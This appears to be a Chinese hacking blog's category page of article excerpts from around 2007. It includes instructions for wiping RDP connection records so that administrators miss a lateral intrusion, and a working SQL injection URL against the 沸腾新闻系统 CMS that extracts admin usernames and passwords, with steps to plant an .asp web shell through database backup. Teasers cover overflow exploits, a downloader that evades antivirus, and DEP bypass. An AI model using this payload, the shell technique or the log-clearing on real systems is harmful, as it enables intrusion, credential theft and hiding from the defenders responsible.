分类 ‘技术文章’ 下的日志

3389登陆记录的清除

来源:慕容小语's Blog

很多时候,因为内网信任或者vlan等我们在外面连不上目标的3389终端,又不可能每次都靠反弹后门来htran

一般来说,可以在内网信任的任何一台机器(比如web)上来直接mstsc来连接内网ip

默认是空记录,或者是仅有几个被连接过的ip记录,当我们连接完内网新的ip的时候,连接记录会默认显示出来,很苦恼啊。有经验的管理员基本上都可以发现

清理很简单

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
把右边显示出来的,非原有的ip键值直接DEL就可以啦~~但是千万记住默认注册表打开的时候,当前键值是在哪儿(一般是主键,没有分树),照着默认一打开时候的树状模样恢复就ok

还是那句话,我们主要是针对有经验的管理员^-^

Tags: ,

沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用

来源:C.Rufus Security Team
by cooldiyer

+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2

后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames[‘list’].document.forms[0].backpath.value=”/data/x.asp”);
阅读全文 »

Tags: , ,

使用vbs下载文件

鬼仔注:一个新的方法,但是缺点是代码有点长了,echo的时候不方便。文中第一段代码可能会被杀毒软件误报,为了避免误会,传到了单独的txt中。

来源:lake2的专栏
说到使用vbs下载文件是不是想到了XMLHTTP呢,呵呵,以下是比较经典的代码:
article_1073_codes.txt
当你把这段代码保存为vbs的时候,杀毒软件可能就开始报警了;而且使用中cscript.exe会访问网络,不太隐蔽。
那么,有没有更好的方法呢?答案很明显:-)
我们可以利用一个叫InternetExplorer.Applica 阅读全文 »

Tags:

解决Win服务器终端连接用户过多的方法

鬼仔注:XP sp3下,取消了/console参数,换成了/admin,mstsc.exe 6.0.6001

/console 连接到服务器的控制台会话

来源:cnfjhh’s blog

不必用logoff id 去T管理了
用下面这个就ok:
运行里输入
mstsc /console /v:IP:终端端口

Tags:

WinRAR 7z压缩包处理溢出分析和利用

文章作者:gyzy [E.S.T](www.gyzy.org)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

本文已经发表在《黑客防线》2007年4月刊。作者及《黑客防线》保留版权,转载请注明原始出处。

适合读者:溢出爱好者
前置知识:汇编语言、缓冲区溢出基本原理

文/图 孤烟逐云(gyzy)【江苏大学信息安全系 & 邪恶八进制信息安全团队】

security.nnov.ru在06年底的时候发布了一个针对WinRAR 7z溢出的POC,可以导致执行恶意代码,可能有些朋友认为7z格式出问题不是那么严重,但WinRAR有个不算Bug的Bug:它是不认扩展名的,这意味着7z格式的压缩包扩展名改成rar还是能被解压,这就给恶意利用创造了机会,嘿嘿。WinR 阅读全文 »

Tags: ,

MS-07004分析和利用

文章作者:gyzy [E.S.T](www.gyzy.org)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

本文已经发表在《黑客防线》2007年3月刊。作者及《黑客防线》保留版权,转载请注明。

适合读者:溢出爱好者
前置知识:汇编语言基础,调试基础,缓冲区溢出原理

文/图 孤烟逐云(gyzy)【江苏大学信息安全系 & 邪恶八进制信息安全团队】

相信大家对去年的MS06-055还记忆犹新吧,微软的矢量标记语言VML中的Method变量IE未对其进行长度进行检查,导致了一个栈溢出漏洞。 2007年的新年钟声刚刚敲响,又一个关于VML的漏洞曝光了,CVMLRecolorinfo::InternalLoad() 中的recolorinfo 阅读全文 »

Tags:

修改引入表打造穿透KIS6的下载者

文章作者:gyzy [E.S.T](www.gyzy.org)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

本文已经发表在《黑客防线》2007年2月刊。作者及《黑客防线》保留版权,转载请注明原始出处。

适合读者:木马爱好者
前置知识:汇编语言基础,PE结构基础

文/图 孤烟逐云(gyzy)【江苏大学信息安全系 & 邪恶八进制信息安全团队】

今年四月份的黑防有一篇文章《把任意可执行文件作为木马载体》,文中介绍了通过给可执行文件添加一个新节并修改程序入口点的方法来加载我们的特洛伊 DLL,此方法具有明显的病毒行为特征,卡巴会将其识别为新的Win32病毒,据我的理解,凡是入口点不是指向代码节的它都会报有毒.KIS是防火墙与杀毒软件等传统安全产品的超集, 阅读全文 »

Tags: ,

Bypass Hardware DEP Tips

Author: axis
Date: 2007-04-27
http://www.ph4nt0m.org

DEP(数据执行保护),是windows针对溢出的一种保护措施,分软dep和硬dep,其中硬dep是需要cpu支持的,比较新的处理器一般都支持这个选项,可以在bios里去打开。简单来说,就是堆栈不可执行了,所以一般的在堆栈里执行shellcode的exploit,会攻击失败。

bypass dep也不是新东西了,目前最好的一篇文档是skape和skywing发在uninformed上的一篇。
http://www.uninformed.org/?v=2&a=4&t=txt

这篇文档写的很好,任何想学习或者研究bypass dep的人,都应该去仔细阅读这份文档。

这次由于metasploit里的dns 阅读全文 »